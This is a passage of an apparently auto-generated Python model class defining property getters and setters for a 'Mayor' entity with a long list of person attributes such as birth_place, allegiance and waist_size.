Description not available # noqa: E501
:param sibling: The sibling of this Mayor. # noqa: E501
:type: list[object]
"""
self._sibling = sibling
@property
def waist_size(self):
"""Gets the waist_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The waist_size of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._waist_size
@waist_size.setter
def waist_size(self, waist_size):
"""Sets the waist_size of this Mayor.
Description not available # noqa: E501
:param waist_size: The waist_size of this Mayor. # noqa: E501
:type: list[float]
"""
self._waist_size = waist_size
@property
def olympic_games_gold(self):
"""Gets the olympic_games_gold of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games_gold of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._olympic_games_gold
@olympic_games_gold.setter
def olympic_games_gold(self, olympic_games_gold):
"""Sets the olympic_games_gold of this Mayor.
Description not available # noqa: E501
:param olympic_games_gold: The olympic_games_gold of this Mayor. # noqa: E501
:type: list[int]
"""
self._olympic_games_gold = olympic_games_gold
@property
def general_council(self):
"""Gets the general_council of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The general_council of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._general_council
@general_council.setter
def general_council(self, general_council):
"""Sets the general_council of this Mayor.
Description not available # noqa: E501
:param general_council: The general_council of this Mayor. # noqa: E501
:type: list[object]
"""
self._general_council = general_council
@property
def arrest_date(self):
"""Gets the arrest_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The arrest_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._arrest_date
@arrest_date.setter
def arrest_date(self, arrest_date):
"""Sets the arrest_date of this Mayor.
Description not available # noqa: E501
:param arrest_date: The arrest_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._arrest_date = arrest_date
@property
def team_manager(self):
"""Gets the team_manager of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The team_manager of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._team_manager
@team_manager.setter
def team_manager(self, team_manager):
"""Sets the team_manager of this Mayor.
Description not available # noqa: E501
:param team_manager: The team_manager of this Mayor. # noqa: E501
:type: list[object]
"""
self._team_manager = team_manager
@property
def birth_sign(self):
"""Gets the birth_sign of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_sign of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._birth_sign
@birth_sign.setter
def birth_sign(self, birth_sign):
"""Sets the birth_sign of this Mayor.
Description not available # noqa: E501
:param birth_sign: The birth_sign of this Mayor. # noqa: E501
:type: list[object]
"""
self._birth_sign = birth_sign
@property
def artistic_function(self):
"""Gets the artistic_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The artistic_function of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._artistic_function
@artistic_function.setter
def artistic_function(self, artistic_function):
"""Sets the artistic_function of this Mayor.
Description not available # noqa: E501
:param artistic_function: The artistic_function of this Mayor. # noqa: E501
:type: list[str]
"""
self._artistic_function = artistic_function
@property
def age(self):
"""Gets the age of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The age of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._age
@age.setter
def age(self, age):
"""Sets the age of this Mayor.
Description not available # noqa: E501
:param age: The age of this Mayor. # noqa: E501
:type: list[int]
"""
self._age = age
@property
def college(self):
"""Gets the college of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The college of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._college
@college.setter
def college(self, college):
"""Sets the college of this Mayor.
Description not available # noqa: E501
:param college: The college of this Mayor. # noqa: E501
:type: list[object]
"""
self._college = college
@property
def education(self):
"""Gets the education of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The education of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._education
@education.setter
def education(self, education):
"""Sets the education of this Mayor.
Description not available # noqa: E501
:param education: The education of this Mayor. # noqa: E501
:type: list[object]
"""
self._education = education
@property
def movie(self):
"""Gets the movie of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The movie of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._movie
@movie.setter
def movie(self, movie):
"""Sets the movie of this Mayor.
Description not available # noqa: E501
:param movie: The movie of this Mayor. # noqa: E501
:type: list[object]
"""
self._movie = movie
@property
def achievement(self):
"""Gets the achievement of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The achievement of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._achievement
@achievement.setter
def achievement(self, achievement):
"""Sets the achievement of this Mayor.
Description not available # noqa: E501
:param achievement: The achievement of this Mayor. # noqa: E501
:type: list[object]
"""
self._achievement = achievement
@property
def death_age(self):
"""Gets the death_age of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The death_age of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._death_age
@death_age.setter
def death_age(self, death_age):
"""Sets the death_age of this Mayor.
Description not available # noqa: E501
:param death_age: The death_age of this Mayor. # noqa: E501
:type: list[int]
"""
self._death_age = death_age
@property
def type(self):
"""Gets the type of this Mayor. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Mayor.
type of the resource # noqa: E501
:param type: The type of this Mayor. # noqa: E501
:type: list[str]
"""
self._type = type
@property
def approach(self):
"""Gets the approach of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The approach of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._approach
@approach.setter
def approach(self, approach):
"""Sets the approach of this Mayor.
Description not available # noqa: E501
:param approach: The approach of this Mayor. # noqa: E501
:type: list[object]
"""
self._approach = approach
@property
def relation(self):
"""Gets the relation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The relation of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._relation
@relation.setter
def relation(self, relation):
"""Sets the relation of this Mayor.
Description not available # noqa: E501
:param relation: The relation of this Mayor. # noqa: E501
:type: list[object]
"""
self._relation = relation
@property
def victory_as_mgr(self):
"""Gets the victory_as_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The victory_as_mgr of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._victory_as_mgr
@victory_as_mgr.setter
def victory_as_mgr(self, victory_as_mgr):
"""Sets the victory_as_mgr of this Mayor.
Description not available # noqa: E501
:param victory_as_mgr: The victory_as_mgr of this Mayor. # noqa: E501
:type: list[int]
"""
self._victory_as_mgr = victory_as_mgr
@property
def living_place(self):
"""Gets the living_place of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The living_place of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._living_place
@living_place.setter
def living_place(self, living_place):
"""Sets the living_place of this Mayor.
Description not available # noqa: E501
:param living_place: The living_place of this Mayor. # noqa: E501
:type: list[object]
"""
self._living_place = living_place
@property
def copilote(self):
"""Gets the copilote of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The copilote of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._copilote
@copilote.setter
def copilote(self, copilote):
"""Sets the copilote of this Mayor.
Description not available # noqa: E501
:param copilote: The copilote of this Mayor. # noqa: E501
:type: list[object]
"""
self._copilote = copilote
@property
def season(self):
"""Gets the season of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The season of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._season
@season.setter
def season(self, season):
"""Sets the season of this Mayor.
Description not available # noqa: E501
:param season: The season of this Mayor. # noqa: E501
:type: list[object]
"""
self._season = season
@property
def start_wct(self):
"""Gets the start_wct of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The start_wct of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._start_wct
@start_wct.setter
def start_wct(self, start_wct):
"""Sets the start_wct of this Mayor.
Description not available # noqa: E501
:param start_wct: The start_wct of this Mayor. # noqa: E501
:type: list[str]
"""
self._start_wct = start_wct
@property
def catch(self):
"""Gets the catch of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The catch of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._catch
@catch.setter
def catch(self, catch):
"""Sets the catch of this Mayor.
Description not available # noqa: E501
:param catch: The catch of this Mayor. # noqa: E501
:type: list[str]
"""
self._catch = catch
@property
def id(self):
"""Gets the id of this Mayor. # noqa: E501
identifier # noqa: E501
:return: The id of this Mayor. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Mayor.
identifier # noqa: E501
:param id: The id of this Mayor. # noqa: E501
:type: str
"""
self._id = id
@property
def feat(self):
"""Gets the feat of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The feat of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._feat
@feat.setter
def feat(self, feat):
"""Sets the feat of this Mayor.
Description not available # noqa: E501
:param feat: The feat of this Mayor. # noqa: E501
:type: list[str]
"""
self._feat = feat
@property
def decoration(self):
"""Gets the decoration of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The decoration of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._decoration
@decoration.setter
def decoration(self, decoration):
"""Sets the decoration of this Mayor.
Description not available # noqa: E501
:param decoration: The decoration of this Mayor. # noqa: E501
:type: list[object]
"""
self._decoration = decoration
@property
def case(self):
"""Gets the case of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The case of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._case
@case.setter
def case(self, case):
"""Sets the case of this Mayor.
Description not available # noqa: E501
:param case: The case of this Mayor. # noqa: E501
:type: list[str]
"""
self._case = case
@property
def sentence(self):
"""Gets the sentence of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sentence of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._sentence
@sentence.setter
def sentence(self, sentence):
"""Sets the sentence of this Mayor.
Description not available # noqa: E501
:param sentence: The sentence of this Mayor. # noqa: E501
:type: list[str]
"""
self._sentence = sentence
@property
def profession(self):
"""Gets the profession of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The profession of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._profession
@profession.setter
def profession(self, profession):
"""Sets the profession of this Mayor.
Description not available # noqa: E501
:param profession: The profession of this Mayor. # noqa: E501
:type: list[object]
"""
self._profession = profession
@property
def retirement_date(self):
"""Gets the retirement_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The retirement_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._retirement_date
@retirement_date.setter
def retirement_date(self, retirement_date):
"""Sets the retirement_date of this Mayor.
Description not available # noqa: E501
:param retirement_date: The retirement_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._retirement_date = retirement_date
@property
def world_tournament(self):
"""Gets the world_tournament of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The world_tournament of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._world_tournament
@world_tournament.setter
def world_tournament(self, world_tournament):
"""Sets the world_tournament of this Mayor.
Description not available # noqa: E501
:param world_tournament: The world_tournament of this Mayor. # noqa: E501
:type: list[object]
"""
self._world_tournament = world_tournament
@property
def wife(self):
"""Gets the wife of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The wife of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._wife
@wife.setter
def wife(self, wife):
"""Sets the wife of this Mayor.
Description not available # noqa: E501
:param wife: The wife of this Mayor. # noqa: E501
:type: list[object]
"""
self._wife = wife
@property
def allegiance(self):
"""Gets the allegiance of this Mayor. # noqa: E501
The country or other power the person served. Multiple countries may be indicated together with the corresponding dates. This field should not be used to indicate a particular service branch, which is better indicated by the branch field. # noqa: E501
:return: The allegiance of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._allegiance
@allegiance.setter
def allegiance(self, allegiance):
"""Sets the allegiance of this Mayor.
The country or other power the person served. Multiple countries may be indicated together with the corresponding dates. This field should not be used to indicate a particular service branch, which is better indicated by the branch field. # noqa: E501
:param allegiance: The allegiance of this Mayor. # noqa: E501
:type: list[str]
"""
self._allegiance = allegiance
@property
def active_years_start_date_mgr(self):
"""Gets the active_years_start_date_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years_start_date_mgr of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_years_start_date_mgr
@active_years_start_date_mgr.setter
def active_years_start_date_mgr(self, active_years_start_date_mgr):
"""Sets the active_years_start_date_mgr of this Mayor.
Description not available # noqa: E501
:param active_years_start_date_mgr: The active_years_start_date_mgr of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_years_start_date_mgr = active_years_start_date_mgr
@property
def lccn_id(self):
"""Gets the lccn_id of this Mayor. # noqa: E501
Library of Congress Control Number # noqa: E501
:return: The lccn_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._lccn_id
@lccn_id.setter
def lccn_id(self, lccn_id):
"""Sets the lccn_id of this Mayor.
Library of Congress Control Number # noqa: E501
:param lccn_id: The lccn_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._lccn_id = lccn_id
@property
def tattoo(self):
"""Gets the tattoo of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The tattoo of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._tattoo
@tattoo.setter
def tattoo(self, tattoo):
"""Sets the tattoo of this Mayor.
Description not available # noqa: E501
:param tattoo: The tattoo of this Mayor. # noqa: E501
:type: list[str]
"""
self._tattoo = tattoo
@property
def british_wins(self):
"""Gets the british_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The british_wins of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._british_wins
@british_wins.setter
def british_wins(self, british_wins):
"""Sets the british_wins of this Mayor.
Description not available # noqa: E501
:param british_wins: The british_wins of this Mayor. # noqa: E501
:type: list[object]
"""
self._british_wins = british_wins
@property
def hip_size(self):
"""Gets the hip_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hip_size of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._hip_size
@hip_size.setter
def hip_size(self, hip_size):
"""Sets the hip_size of this Mayor.
Description not available # noqa: E501
:param hip_size: The hip_size of this Mayor. # noqa: E501
:type: list[float]
"""
self._hip_size = hip_size
@property
def podium(self):
"""Gets the podium of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The podium of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._podium
@podium.setter
def podium(self, podium):
"""Sets the podium of this Mayor.
Description not available # noqa: E501
:param podium: The podium of this Mayor. # noqa: E501
:type: list[int]
"""
self._podium = podium
@property
def seiyu(self):
"""Gets the seiyu of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The seiyu of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._seiyu
@seiyu.setter
def seiyu(self, seiyu):
"""Sets the seiyu of this Mayor.
Description not available # noqa: E501
:param seiyu: The seiyu of this Mayor. # noqa: E501
:type: list[object]
"""
self._seiyu = seiyu
@property
def player_season(self):
"""Gets the player_season of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The player_season of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._player_season
@player_season.setter
def player_season(self, player_season):
"""Sets the player_season of this Mayor.
Description not available # noqa: E501
:param player_season: The player_season of this Mayor. # noqa: E501
:type: list[object]
"""
self._player_season = player_season
@property
def short_prog_score(self):
"""Gets the short_prog_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The short_prog_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._short_prog_score
@short_prog_score.setter
def short_prog_score(self, short_prog_score):
"""Sets the short_prog_score of this Mayor.
Description not available # noqa: E501
:param short_prog_score: The short_prog_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._short_prog_score = short_prog_score
@property
def regional_council(self):
"""Gets the regional_council of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The regional_council of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._regional_council
@regional_council.setter
def regional_council(self, regional_council):
"""Sets the regional_council of this Mayor.
Description not available # noqa: E501
:param regional_council: The regional_council of this Mayor. # noqa: E501
:type: list[object]
"""
self._regional_council = regional_council
@property
def homage(self):
"""Gets the homage of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The homage of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._homage
@homage.setter
def homage(self, homage):
"""Sets the homage of this Mayor.
Description not available # noqa: E501
:param homage: The homage of this Mayor. # noqa: E501
:type: list[str]
"""
self._homage = homage
@property
def shoe_size(self):
"""Gets the shoe_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The shoe_size of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._shoe_size
@shoe_size.setter
def shoe_size(self, shoe_size):
"""Sets the shoe_size of this Mayor.
Description not available # noqa: E501
:param shoe_size: The shoe_size of this Mayor. # noqa: E501
:type: list[str]
"""
self._shoe_size = shoe_size
@property
def signature(self):
"""Gets the signature of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The signature of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._signature
@signature.setter
def signature(self, signature):
"""Sets the signature of this Mayor.
Description not available # noqa: E501
:param signature: The signature of this Mayor. # noqa: E501
:type: list[str]
"""
self._signature = signature
@property
def olympic_games_bronze(self):
"""Gets the olympic_games_bronze of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games_bronze of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._olympic_games_bronze
@olympic_games_bronze.setter
def olympic_games_bronze(self, olympic_games_bronze):
"""Sets the olympic_games_bronze of this Mayor.
Description not available # noqa: E501
:param olympic_games_bronze: The olympic_games_bronze of this Mayor. # noqa: E501
:type: list[int]
"""
self._olympic_games_bronze = olympic_games_bronze
@property
def danse_score(self):
"""Gets the danse_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The danse_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._danse_score
@danse_score.setter
def danse_score(self, danse_score):
"""Sets the danse_score of this Mayor.
Description not available # noqa: E501
:param danse_score: The danse_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._danse_score = danse_score
@property
def id_number(self):
"""Gets the id_number of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The id_number of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._id_number
@id_number.setter
def id_number(self, id_number):
"""Sets the id_number of this Mayor.
Description not available # noqa: E501
:param id_number: The id_number of this Mayor. # noqa: E501
:type: list[int]
"""
self._id_number = id_number
@property
def short_prog_competition(self):
"""Gets the short_prog_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The short_prog_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._short_prog_competition
@short_prog_competition.setter
def short_prog_competition(self, short_prog_competition):
"""Sets the short_prog_competition of this Mayor.
Description not available # noqa: E501
:param short_prog_competition: The short_prog_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._short_prog_competition = short_prog_competition
@property
def active_years_start_year_mgr(self):
"""Gets the active_years_start_year_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years_start_year_mgr of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_years_start_year_mgr
@active_years_start_year_mgr.setter
def active_years_start_year_mgr(self, active_years_start_year_mgr):
"""Sets the active_years_start_year_mgr of this Mayor.
Description not available # noqa: E501
:param active_years_start_year_mgr: The active_years_start_year_mgr of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_years_start_year_mgr = active_years_start_year_mgr
@property
def wedding_parents_date(self):
"""Gets the wedding_parents_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The wedding_parents_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._wedding_parents_date
@wedding_parents_date.setter
def wedding_parents_date(self, wedding_parents_date):
"""Sets the wedding_parents_date of this Mayor.
Description not available # noqa: E501
:param wedding_parents_date: The wedding_parents_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._wedding_parents_date = wedding_parents_date
@property
def birth_place(self):
    """Return ``birth_place`` — where the person was born (list[object])."""
    return self._birth_place

@birth_place.setter
def birth_place(self, birth_place):
    """Assign ``birth_place`` — where the person was born (list[object])."""
    self._birth_place = birth_place

@property
def world(self):
    """Return the ``world`` value of this Mayor (list[object])."""
    return self._world

@world.setter
def world(self, world):
    """Assign the ``world`` value of this Mayor (list[object])."""
    self._world = world

@property
def astrological_sign(self):
    """Return the ``astrological_sign`` value of this Mayor (list[object])."""
    return self._astrological_sign

@astrological_sign.setter
def astrological_sign(self, astrological_sign):
    """Assign the ``astrological_sign`` value of this Mayor (list[object])."""
    self._astrological_sign = astrological_sign

@property
def eye_color(self):
    """Return the ``eye_color`` value of this Mayor (list[object])."""
    return self._eye_color

@eye_color.setter
def eye_color(self, eye_color):
    """Assign the ``eye_color`` value of this Mayor (list[object])."""
    self._eye_color = eye_color

@property
def networth(self):
    """Return the ``networth`` value of this Mayor (list[float])."""
    return self._networth

@networth.setter
def networth(self, networth):
    """Assign the ``networth`` value of this Mayor (list[float])."""
    self._networth = networth

@property
def coalition(self):
    """Return ``coalition`` (list[str]).

    Historically a military term for a close formation in which each
    warrior protected the man beside him with his shield.
    """
    return self._coalition

@coalition.setter
def coalition(self, coalition):
    """Assign ``coalition`` (list[str]); see the getter for the term's origin."""
    self._coalition = coalition

@property
def national_team_match_point(self):
    """Return the ``national_team_match_point`` value of this Mayor (list[str])."""
    return self._national_team_match_point

@national_team_match_point.setter
def national_team_match_point(self, national_team_match_point):
    """Assign the ``national_team_match_point`` value of this Mayor (list[str])."""
    self._national_team_match_point = national_team_match_point

@property
def national_selection(self):
    """Return the ``national_selection`` value of this Mayor (list[object])."""
    return self._national_selection

@national_selection.setter
def national_selection(self, national_selection):
    """Assign the ``national_selection`` value of this Mayor (list[object])."""
    self._national_selection = national_selection

@property
def agency(self):
    """Return the ``agency`` value of this Mayor (list[object])."""
    return self._agency

@agency.setter
def agency(self, agency):
    """Assign the ``agency`` value of this Mayor (list[object])."""
    self._agency = agency

@property
def start_wqs(self):
    """Return the ``start_wqs`` value of this Mayor (list[str])."""
    return self._start_wqs

@start_wqs.setter
def start_wqs(self, start_wqs):
    """Assign the ``start_wqs`` value of this Mayor (list[str])."""
    self._start_wqs = start_wqs
@property
def defeat_as_mgr(self):
    """Return the ``defeat_as_mgr`` value of this Mayor (list[int])."""
    return self._defeat_as_mgr

@defeat_as_mgr.setter
def defeat_as_mgr(self, defeat_as_mgr):
    """Assign the ``defeat_as_mgr`` value of this Mayor (list[int])."""
    self._defeat_as_mgr = defeat_as_mgr

@property
def death_year(self):
    """Return the ``death_year`` value of this Mayor (list[str])."""
    return self._death_year

@death_year.setter
def death_year(self, death_year):
    """Assign the ``death_year`` value of this Mayor (list[str])."""
    self._death_year = death_year

@property
def world_tournament_gold(self):
    """Return the ``world_tournament_gold`` value of this Mayor (list[int])."""
    return self._world_tournament_gold

@world_tournament_gold.setter
def world_tournament_gold(self, world_tournament_gold):
    """Assign the ``world_tournament_gold`` value of this Mayor (list[int])."""
    self._world_tournament_gold = world_tournament_gold

@property
def pga_wins(self):
    """Return the ``pga_wins`` value of this Mayor (list[object])."""
    return self._pga_wins

@pga_wins.setter
def pga_wins(self, pga_wins):
    """Assign the ``pga_wins`` value of this Mayor (list[object])."""
    self._pga_wins = pga_wins

@property
def board(self):
    """Return the ``board`` value of this Mayor (list[object])."""
    return self._board

@board.setter
def board(self, board):
    """Assign the ``board`` value of this Mayor (list[object])."""
    self._board = board

@property
def rid_id(self):
    """Return ``rid_id`` (list[str]).

    ResearcherID: an identifier for scientific authors introduced in
    January 2008 by Thomson Reuters; combined with the DOI it uniquely
    associates authors with scientific articles.
    """
    return self._rid_id

@rid_id.setter
def rid_id(self, rid_id):
    """Assign ``rid_id`` — ResearcherID identifiers (list[str])."""
    self._rid_id = rid_id

@property
def dead_in_fight_date(self):
    """Return the ``dead_in_fight_date`` value of this Mayor (list[str])."""
    return self._dead_in_fight_date

@dead_in_fight_date.setter
def dead_in_fight_date(self, dead_in_fight_date):
    """Assign the ``dead_in_fight_date`` value of this Mayor (list[str])."""
    self._dead_in_fight_date = dead_in_fight_date

@property
def related_functions(self):
    """Return ``related_functions`` — related personFunctions the person holds or has held (list[object])."""
    return self._related_functions

@related_functions.setter
def related_functions(self, related_functions):
    """Assign ``related_functions`` — related personFunctions the person holds or has held (list[object])."""
    self._related_functions = related_functions

@property
def manager_season(self):
    """Return the ``manager_season`` value of this Mayor (list[object])."""
    return self._manager_season

@manager_season.setter
def manager_season(self, manager_season):
    """Assign the ``manager_season`` value of this Mayor (list[object])."""
    self._manager_season = manager_season

@property
def reign(self):
    """Return the ``reign`` value of this Mayor (list[str])."""
    return self._reign

@reign.setter
def reign(self, reign):
    """Assign the ``reign`` value of this Mayor (list[str])."""
    self._reign = reign
@property
def second(self):
    """Return the ``second`` value of this Mayor (list[int])."""
    return self._second

@second.setter
def second(self, second):
    """Assign the ``second`` value of this Mayor (list[int])."""
    self._second = second

@property
def radio(self):
    """Return ``radio`` (list[object]).

    A radio is a receiver/converter device that picks up the broadcasts
    of radio stations and turns them into sound.
    """
    return self._radio

@radio.setter
def radio(self, radio):
    """Assign ``radio`` — radio stations/devices associated with this Mayor (list[object])."""
    self._radio = radio

@property
def full_competition(self):
    """Return the ``full_competition`` value of this Mayor (list[str])."""
    return self._full_competition

@full_competition.setter
def full_competition(self, full_competition):
    """Assign the ``full_competition`` value of this Mayor (list[str])."""
    self._full_competition = full_competition

@property
def free_score_competition(self):
    """Return the ``free_score_competition`` value of this Mayor (list[str])."""
    return self._free_score_competition

@free_score_competition.setter
def free_score_competition(self, free_score_competition):
    """Assign the ``free_score_competition`` value of this Mayor (list[str])."""
    self._free_score_competition = free_score_competition

@property
def prefect(self):
    """Return the ``prefect`` value of this Mayor (list[object])."""
    return self._prefect

@prefect.setter
def prefect(self, prefect):
    """Assign the ``prefect`` value of this Mayor (list[object])."""
    self._prefect = prefect

@property
def publication(self):
    """Return the ``publication`` value of this Mayor (list[str])."""
    return self._publication

@publication.setter
def publication(self, publication):
    """Assign the ``publication`` value of this Mayor (list[str])."""
    self._publication = publication

@property
def opponent(self):
    """Return the ``opponent`` value of this Mayor (list[object])."""
    return self._opponent

@opponent.setter
def opponent(self, opponent):
    """Assign the ``opponent`` value of this Mayor (list[object])."""
    self._opponent = opponent

@property
def employer(self):
    """Return the ``employer`` value of this Mayor (list[object])."""
    return self._employer

@employer.setter
def employer(self, employer):
    """Assign the ``employer`` value of this Mayor (list[object])."""
    self._employer = employer

@property
def affair(self):
    """Return the ``affair`` value of this Mayor (list[str])."""
    return self._affair

@affair.setter
def affair(self, affair):
    """Assign the ``affair`` value of this Mayor (list[str])."""
    self._affair = affair

@property
def body_discovered(self):
    """Return the ``body_discovered`` value of this Mayor (list[object])."""
    return self._body_discovered

@body_discovered.setter
def body_discovered(self, body_discovered):
    """Assign the ``body_discovered`` value of this Mayor (list[object])."""
    self._body_discovered = body_discovered
@property
def buried_place(self):
    """Return ``buried_place`` — the place where the person has been buried (list[object])."""
    return self._buried_place

@buried_place.setter
def buried_place(self, buried_place):
    """Assign ``buried_place`` — the place where the person has been buried (list[object])."""
    self._buried_place = buried_place

@property
def residence(self):
    """Return ``residence`` — place of residence of the person (list[object])."""
    return self._residence

@residence.setter
def residence(self, residence):
    """Assign ``residence`` — place of residence of the person (list[object])."""
    self._residence = residence

@property
def usurper(self):
    """Return the ``usurper`` value of this Mayor (list[object])."""
    return self._usurper

@usurper.setter
def usurper(self, usurper):
    """Assign the ``usurper`` value of this Mayor (list[object])."""
    self._usurper = usurper

@property
def other_occupation(self):
    """Return the ``other_occupation`` value of this Mayor (list[object])."""
    return self._other_occupation

@other_occupation.setter
def other_occupation(self, other_occupation):
    """Assign the ``other_occupation`` value of this Mayor (list[object])."""
    self._other_occupation = other_occupation

@property
def contest(self):
    """Return the ``contest`` value of this Mayor (list[object])."""
    return self._contest

@contest.setter
def contest(self, contest):
    """Assign the ``contest`` value of this Mayor (list[object])."""
    self._contest = contest

@property
def active_years_end_date_mgr(self):
    """Return the ``active_years_end_date_mgr`` value of this Mayor (list[str])."""
    return self._active_years_end_date_mgr

@active_years_end_date_mgr.setter
def active_years_end_date_mgr(self, active_years_end_date_mgr):
    """Assign the ``active_years_end_date_mgr`` value of this Mayor (list[str])."""
    self._active_years_end_date_mgr = active_years_end_date_mgr

@property
def created(self):
    """Return the ``created`` value of this Mayor (list[object])."""
    return self._created

@created.setter
def created(self, created):
    """Assign the ``created`` value of this Mayor (list[object])."""
    self._created = created

@property
def original_danse_score(self):
    """Return the ``original_danse_score`` value of this Mayor (list[str])."""
    return self._original_danse_score

@original_danse_score.setter
def original_danse_score(self, original_danse_score):
    """Assign the ``original_danse_score`` value of this Mayor (list[str])."""
    self._original_danse_score = original_danse_score

@property
def end_career(self):
    """Return the ``end_career`` value of this Mayor (list[str])."""
    return self._end_career

@end_career.setter
def end_career(self, end_career):
    """Assign the ``end_career`` value of this Mayor (list[str])."""
    self._end_career = end_career

@property
def note_on_resting_place(self):
    """Return the ``note_on_resting_place`` value of this Mayor (list[str])."""
    return self._note_on_resting_place

@note_on_resting_place.setter
def note_on_resting_place(self, note_on_resting_place):
    """Assign the ``note_on_resting_place`` value of this Mayor (list[str])."""
    self._note_on_resting_place = note_on_resting_place
@property
def army(self):
    """Return ``army`` (list[str]).

    An army constitutes the land-based armed forces of a nation.
    """
    return self._army

@army.setter
def army(self, army):
    """Assign ``army`` — the land armed forces associated with this Mayor (list[str])."""
    self._army = army

@property
def active_year(self):
    """Return the ``active_year`` value of this Mayor (list[str])."""
    return self._active_year

@active_year.setter
def active_year(self, active_year):
